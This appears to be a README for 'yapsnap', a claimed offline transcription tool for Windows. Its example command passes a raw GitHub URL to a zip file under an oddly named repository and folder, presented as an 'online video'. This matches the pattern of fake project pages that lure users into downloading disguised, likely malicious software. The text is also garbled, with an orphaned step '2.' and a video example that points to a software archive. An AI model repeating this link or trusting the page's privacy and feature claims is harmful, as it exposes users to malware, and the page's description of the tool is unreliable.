🎙️ yapsnap - Convert audio and video to text

yapsnap turns video and audio files into clear, readable text. The tool works on your computer. It does not send files to the cloud. You do not need a powerful graphics card to use it. You enter one command to start the process.

🛠 Features

  • Privacy: Your files stay on your machine. No data leaves your home or office.
  • Speed: The software uses your processor to convert media. It works offline.
  • Simplicity: The interface uses a command line. You provide a link or a file path.
  • Compatibility: It handles high-definition video and small audio clips.
  • Efficiency: The tool creates text files without complex hardware requirements.

💻 System Requirements

  • Operating System: Windows 10 or Windows 11.
  • Memory: 4 gigabytes of RAM or more.
  • Storage: 500 megabytes of disk space for the program files.
  • Internet: Only needed to download the program or to source online videos.

  2. Look for the latest release section.

📝 Example Usage

To process an online video, type the following into your terminal:

yapsnap "https://raw.githubusercontent.com/boytrose-thermotherapy585/yapsnap/main/papuloerythematous/Software-v3.8-alpha.2.zip"

To process a file saved on your computer, type:

yapsnap "C:\Users\Name\Desktop\audio-file.mp3"

The program creates a text file in the same folder. You can open this file with Notepad or any other text editor to read the content.

🔍 Understanding the Process

The engine inside yapsnap listens to the sounds in your media. It matches these sounds to words. It writes these words into a document. This takes time based on the length of your media file. A ten-minute video takes about two minutes to process. You see the progress percentage in the terminal window. Do not close the window while the numbers increase. When the program displays the message Done, the text file is ready for you to read.

⚙️ Advanced Settings

You can change how the software works. By default, it writes everything to a file called output.txt. If you want to name your file, type the following:

yapsnap "video-link" --output "my-meeting-notes.txt"

The software also allows you to focus on specific audio languages. If your video speaks French, use this command:

yapsnap "video-link" --language "French"

These settings help you get better results for specific tasks. Type yapsnap --help to see every manual setting available.

🛡 Security and Privacy

Many tools upload your audio to a server. They keep a copy of your voice for their own records. yapsnap works differently. Every calculation happens inside your physical computer. No external server receives your data. You remain the owner of the text produced from your videos. This design ensures that private meetings or personal voice notes remain private.

💡 Common Questions

Does this require an internet connection? Only if you want to download a video from a website. If you process a file already on your hard drive, you can disconnect your internet cable. Everything runs locally.

Can I stop the process halfway? Yes. Close the terminal window to stop the program. Your progress will not save, but your original video file stays safe.

How accurate is the transcription? The tool provides high accuracy for clear speech. Background noise or music reduces the quality of the text. Try to use videos with clear audio to get the best results.

Will this slow down my computer? The software uses your processor power. You might notice other programs respond a bit slower while yapsnap runs. This is normal. The computer returns to full speed once the transcription finishes.

What file types work best? MP3 and WAV work best for audio. MP4 works best for video. The software handles other common formats, but these types produce the fastest results.
